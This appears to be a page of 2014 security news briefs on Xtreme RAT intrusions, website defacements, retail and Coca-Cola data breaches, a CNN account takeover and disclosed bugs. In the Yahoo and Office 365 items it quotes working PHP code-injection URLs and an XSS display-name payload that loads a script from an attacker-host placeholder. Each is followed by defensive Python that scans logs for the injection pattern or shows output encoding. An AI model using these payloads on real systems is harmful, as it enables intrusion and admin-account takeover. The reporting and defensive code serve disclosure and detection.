
Hackers used Xtreme RAT malware to gain access to Israeli Defense computer



 
Seculert, an Israeli cyber security firm, told Reuters that hackers gained access to an Israeli Defense Ministry computer by sending a malicious email carrying the Xtreme RAT.

Seculert CTO Aviv Raff told Reuters that earlier this month hackers took control of around 15 computers, including the Israeli Civil Administration computer that monitors Palestinians in Israeli-occupied territory.

The firm declined to identify the other 14 computers targeted by the hackers. An anonymous source told Reuters these included companies involved in supplying Israeli defense infrastructure.

The latest attack appears to have originated from US servers. However, experts noticed some similarities to previous attacks, and the firm suspects Palestinians to be behind the cyber attack.

The firm hadn't determined what the hackers did after gaining access to the systems. It believes that the hackers had access to the infected computers for several days.

Xtreme RAT is a remote access trojan that gives attackers complete control of an infected system. An attacker is able to steal any documents or execute further malware on the system.

The same malware has been used in several other targeted attacks, including attacks against the Israeli police department, Syrian anti-government activists and other governments.

Ebrahim Hegazy discovered PHP Code Injection Vulnerability in Yahoo

PHP Code Injection vulnerability

Web application penetration tester Ebrahim Hegazy has discovered a critical remote PHP code injection vulnerability in a Yahoo website that could have allowed hackers to inject and execute arbitrary PHP code on the Yahoo server.

The vulnerability exists in the Taiwan sub-domain of Yahoo, http://tw.user.mall.yahoo.com/rating/list?sid=[CODE_Injection]. The 'sid' parameter allows PHP code to be injected.

According to his blog post, the sid parameter might have been passed directly to an eval() function, which results in the code injection.

In his demo, Ebrahim showed how to get the directory listing and the process list by injecting the following code:
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("dir"))}
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("ps"))}
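The payloads above are easy to spot after the fact in web server logs. The Python below is an added example (not the researcher's or Yahoo's code) that URL-decodes each query parameter in constructed common-log-format lines and flags PHP "${ ... }" expressions wrapping a command- or code-execution call; the endpoint path is the one from the article, the traffic is invented.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines in common log format (the endpoint path from
# the article, with traffic invented for this example).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jan/2014:10:01:02 +0000] "GET /rating/list?sid=12345 HTTP/1.1" 200 512
203.0.113.9 - - [21/Jan/2014:10:01:07 +0000] "GET /rating/list?sid=%24%7B%40print%28system%28%22dir%22%29%29%7D HTTP/1.1" 200 2048
203.0.113.9 - - [21/Jan/2014:10:01:09 +0000] "GET /rating/list?sid=${@print(system(%22ps%22))} HTTP/1.1" 200 4096
198.51.100.2 - - [21/Jan/2014:10:02:00 +0000] "GET /rating/list?sid=abc&page=2 HTTP/1.1" 200 600
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+"')

# PHP's ${ ... } "complex variable" syntax is what lets eval()'d input run an
# arbitrary expression; the article's payload was ${@print(system("dir"))}.
# Flag ${ ... } that wraps any command- or code-execution function.
INJECTION_RE = re.compile(
    r"\$\{[^}]*?\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE)


def decode_params(target):
    """URL-decode every query parameter of a request target; decode a second
    time so a double-encoded payload cannot slip past the pattern."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {name: [unquote_plus(v) for v in values] for name, values in params.items()}


def scan_log(text):
    """Return one finding per query parameter value that carries a PHP
    code-injection pattern, with the decoded value kept for triage."""
    findings = []
    for line in text.splitlines():
        req = REQUEST_RE.match(line)
        if not req:
            continue
        for name, values in decode_params(req["target"]).items():
            for value in values:
                hit = INJECTION_RE.search(value)
                if hit:
                    findings.append({"ip": req["ip"], "time": req["ts"], "param": name,
                                     "call": hit.group(1).lower(), "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} param={f['param']} call={f['call']} value={f['value']}")
```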

He also found that the Yahoo server was running an outdated kernel vulnerable to a local privilege escalation vulnerability.

Yahoo fixed the issue immediately after being notified by the researcher. However, he is still waiting for a bug bounty reward for the bug. Google pays $20,000 for this kind of vulnerability, while Yahoo sets its maximum bounty at $15,000. Let us see how much bounty Yahoo offers for this vulnerability.


Last month, German security researcher David Vieira-Kurz discovered a similar remote code execution vulnerability in the eBay website.

MS Dhoni official website hacked by United Bangladeshi Hackers


The official website of MS Dhoni, captain of the Indian cricket team, has been hacked and defaced by a Bangladeshi hacker group called "United Bangladeshi Hackers".

The defacement was first discovered and reported by Techgator.

The hackers didn't deface the home page. They only managed to upload a text file named "bd.txt" to the "Uploadedfiles" directory (http://www.dhoniworld.com/uploadedfiles/bd.txt).

We are not sure how the hackers managed to hack the website, whether they had admin access or just exploited an "Unrestricted File Upload" vulnerability.

"Hacked By Black Tiger From United Bangladeshi Hackers. Stop Abusing Our Test Cricket. Don't Try To Play With Fire. We Are Bangladeshi Hackers. Mind It!" reads the defacement left on the page.

After checking the Uploadedfiles directory, we came to know that this is not the first time the website has been hacked. Several other hacker groups have also managed to upload text and image files. It appears hackers also attempted to upload a C99 backdoor shell.


*Update: No, it is not hacked
One EHN reader, Sri Ram Shyam, contacted me and provided more information on how the hackers managed to upload the files.


It is neither an "unrestricted file upload" nor any other vulnerability. The form itself allows only image/text files to be uploaded. I believe it is not harmful to the website in any way.

Michaels Stores may be third major retailer to be victim of security breach

It looks like security blogger Brian Krebs has brought another possible data breach to light. This time it is Michaels Stores, the biggest specialty retailer of arts, crafts and more.

The company said on Saturday that it started an investigation after learning of possible fraudulent activity on some U.S. payment cards that had been used at Michaels' stores.

Michaels Stores said it is working with federal law enforcement and has hired third-party forensic investigators to determine whether there has been a data breach.

While the company said it has not yet confirmed a data breach, it has decided it is better to notify its customers so that they can protect themselves.

This is the third major credit card cyber attack reported in recent months. In December 2013, US retail giant Target reported a data breach affecting 40 million customers. Earlier this month, US luxury retailer Neiman Marcus also gave notice of a data breach that exposed approximately 1.1 million credit and debit cards to hackers.

No, your fridge is not sending spam emails - they are innocent

A recent report from security firm Proofpoint claiming that "Internet connected refrigerators are participating in a massive cyber attack" is one of the hot topics in information security.

The report said that a massive global cyber attack involving more than 750k malicious emails relied on more than 100k consumer gadgets such as routers, multimedia systems, TVs and refrigerators.

However, a recent report from Symantec says that "Internet of Things" devices, including the Internet-connected fridge, are not the source of this spam campaign.

Symantec confirmed the source of the spam as several Windows-based computers; none of it originated from any non-Windows computer system.

"If your refrigerator uses a feature known as port forwarding and someone contacts the IP address on port 80, that traffic is allowed to reach your smart refrigerator," the Symantec report reads.


"Viewed from outside, all you will see is the refrigerator and you may not even realize there is a router with potentially many other devices behind it, such as an infected computer." Symantec experts explained that this might be why researchers mistakenly considered the IoT devices to be the source of the spam campaign.

Even though IoT devices such as fridges are innocent this time, experts say that we can expect them to be exploited by cyber criminals in the future. Researchers also pointed out that there is already some malware targeting Linux-based IoT devices.

Official websites of Daler Mehndi and Raghav hacked by Haxor 99


A Pakistani hacker with the handle "Haxor 99", from Team MadLeets, has hacked into the official website of Indian pop singer Daler Mehndi, known for his work on the movie Rang De Basanti.

"Your site security is compromised," the hacker wrote on the defacement page. "Nothing Delete or Harmed... Rise a Voice for Justice of Kashmir. Patch Your Site"

He also defaced the official website of Raghav Mathur, a Canadian singer. The same message was left in that defacement.

Affected websites:
www.dalermehndi.com
www.raghav.com

At the time of writing, both websites are still defaced. You can also check the mirror of the defacement here:
http://www.zone-h.org/archive/notifier=haxor%2099

Data Breach: Laptops containing personal information of 74k people stolen from Coca-Cola


The Coca-Cola company reported a data breach on Friday. 74,000 people are at risk after laptops containing their personal details were stolen from the company's Atlanta headquarters.

According to the Wall Street Journal report, the information belongs to employees, suppliers and contractors.

The laptops contained information such as Social Security numbers, addresses, driver's license numbers, some financial details and other personal information.

As per Coca-Cola's policies, the laptops should have been encrypted. The worst part is that the stolen laptops weren't.

The company learned about the data breach on Dec. 10, 2013. The laptops apparently were stolen by a former employee who was in charge of maintaining or disposing of equipment.

The affected individuals have been notified about the breach and are also being offered a free credit card monitoring service.

Certified Whitehat Hacker Level 1 Training

The Cyber Security Privacy Foundation (CSPF) invites you all to be a part of our Certified WhiteHat Hacker Level I training on 8 February 2014 in Chennai.

Level 1 is for everyone (even if you don't have any technical knowledge). It is a basic kick-starter for people who want to get into the cyber security industry, and is specially designed for people with no background in security, so that you can start your journey into security.

Free education for below-poverty-line students:
CSPF provides free training for students who are financially weak. Such students can contact CSPF directly by mailing us at "founder@cysecurity.org" with their details and their BPL card.

We are also proud to say that CWHH Level 1 training in Bangalore will very soon be launched with the Center for Internet Studies (CIS) and a Canadian university.

The fee for this Level 1 course is Rs. 600/-. Register before January 30, 2014; the price will increase after that date.

Registration Link:

http://www.meraevents.com/event/certified-white-hat-hacker-level-1_1

Note: There will be no on-the-spot registration.

You can find more details about the course here.

Persistent XSS vulnerability in Office 365 website allows attackers to take over the admin account



Cogmotive has discovered a potentially critical persistent cross-site scripting (XSS) vulnerability in Office 365, the cloud version of Office. Successful exploitation allows an attacker to take control of an administrator account.

To exploit this vulnerability, the attacker has to be one of the users. A malicious employee can change their own display name to an XSS vector.

For instance, an attacker can set his display name to the following script:
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("https://[attacker_website]/exploit/b.js", function() { c(); });'>'

The user administration page displays the list of users in the portal, so when a user changes his name, the change is reflected on that page.

When an admin user logs into the portal and opens the "User administration" page, the payload is executed. It loads the malicious JavaScript file hosted on the attacker's server and runs it.

An attacker can exploit this vulnerability to create an administrator within the company's Office 365 environment.
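The display name only becomes dangerous because the admin page copies it into HTML without output encoding. The Python below is an added example (not Cogmotive's or Microsoft's code) that renders a constructed user list both ways with the payload quoted above and lists which tags survive; the template and user entries are invented for the example.

```python
import html
import re

# The display-name payload quoted in the article (kept verbatim, including
# the [attacker_website] placeholder).
PAYLOAD_NAME = (
    "/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>"
    "'-/\"///><img id=\"b1\" src=1 "
    "onerror='$.getScript(\"https://[attacker_website]/exploit/b.js\", function() { c(); });'>'"
)

# Constructed directory entries for this example; the last is the malicious employee.
USERS = [
    ("alice@example.test", "Alice Adams"),
    ("bob@example.test", "Bob O'Brien"),
    ("mallory@example.test", PAYLOAD_NAME),
]

ROW = "<tr><td>{login}</td><td>{name}</td></tr>"


def render_vulnerable(users):
    """Mimics the bug: the stored display name is copied into the admin page as-is."""
    return "<table>" + "".join(ROW.format(login=l, name=n) for l, n in users) + "</table>"


def esc(text):
    """Output encoding for an HTML element context: < > & " ' all become entities."""
    return html.escape(text, quote=True)


def render_hardened(users):
    """Same page, but every user-controlled value is encoded on output, so the
    closing tags and the <img onerror=...> in the payload stay inert text."""
    return "<table>" + "".join(ROW.format(login=esc(l), name=esc(n)) for l, n in users) + "</table>"


TAG_RE = re.compile(r"<\s*/?\s*([a-z][a-z0-9]*)\b", re.IGNORECASE)
TEMPLATE_TAGS = {"table", "tr", "td"}


def foreign_tags(page):
    """Tag names in the rendered page that the template never emits, i.e.
    markup that arrived through user-controlled data."""
    return sorted({m.group(1).lower() for m in TAG_RE.finditer(page)} - TEMPLATE_TAGS)


if __name__ == "__main__":
    print("vulnerable:", foreign_tags(render_vulnerable(USERS)))
    print("hardened:  ", foreign_tags(render_hardened(USERS)))
```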

"It is worth noting that this weakness seems to have been introduced recently within the new Wave 15 version of Office 365," Alan Byrne, co-founder of Cogmotive, said in the company's blog.

Alan reported the bug to Microsoft immediately, in October 2013. Microsoft patched the vulnerability in December 2013.




CNN Twitter account and blog hacked by Syrian Electronic Army


Fake article posted by the Syrian Electronic Army

Just a few hours ago, the Syrian Electronic Army hijacked the official Twitter account of CNN and started posting a series of tweets.

The hackers said the hack is part of a retaliation against CNN for its "viciously lying reporting aimed at prolonging the suffering in #Syria."

"#CNN used its usual formula of present unverifiable information as truth, adopting a report by Qataris against #Syria." reads one of the tweets posted by the hackers.

The group appears to have compromised the main Twitter account @CNN as well as @natlsecuritycnn, the main Facebook page of CNN and the CNN Politics Facebook page.



"US Media strategy is now to hide the fact that the CIA controls and funds Al Qaeda by blaming #Syria instead for their terror. #SEA" reads a recent tweet from the group.

The group also managed to compromise the "CNN Security Clearance", "Political Ticker", "The Lead", "The Situation Room" and "Crossfire" blogs.

They also managed to post a fake article entitled "BREAKING NEWS: US declares state of national emergency, State Department reportedly out of reach", along with other fake stories:

  • http://security.blogs.cnn.com/2014/01/23/breaking-news-us-declares-state-of-national-emergency-state-department-reportedly-out-of-reach/
  • "China dumps all bonds, declares South China Sea closed zone ": http://politicalticker.blogs.cnn.com/2014/01/23/breaking-china-dumps-all-bonds-declares-south-china-sea-closed-zone/ 
  • http://situationroom.blogs.cnn.com/2014/01/23/breaking-china-dumps-all-bonds-declares-south-china-sea-closed-zone/


CNN confirmed the hack in a recent tweet saying: "Some of our organization's social media accounts were compromised. We have secured those accounts and deleted unauthorized tweets."

WHMCS Documentation website hacked by b0x

A hacker with the online name "b0x", also one of the admins of the MadLeets hacker forum, has hacked into a website of WHMCS, a company that offers client management, billing and support solutions for online businesses.

The main page of the website is not affected by this breach. The hacker managed to upload an HTML file, "b0x.html", to the images directory of the WHMCS documentation website (docs.whmcs.com).

The hacker didn't leave any message other than "b0x" on the defacement page. When the main page of a website is not defaced, it takes time for the admin to notice, so we are still able to see the defacement at "http://docs.whmcs.com/images/b0x.html".

The hacker also provided a mirror of the defacement: "http://zone-h.org/mirror/id/21518159".

This is not the first time WHMCS has been the victim of a hacker attack. In 2012, the infamous UGNazi hacker group broke into WHMCS using a social engineering attack.

Update:

"Our system admin team just evaluated the server and b0x.html had a timestamp dating back to 2012. At the current time it is our belief that this was the result of a previous vulnerability related to mediawiki and no defacement has taken place." WHMCS representatives told Softpedia.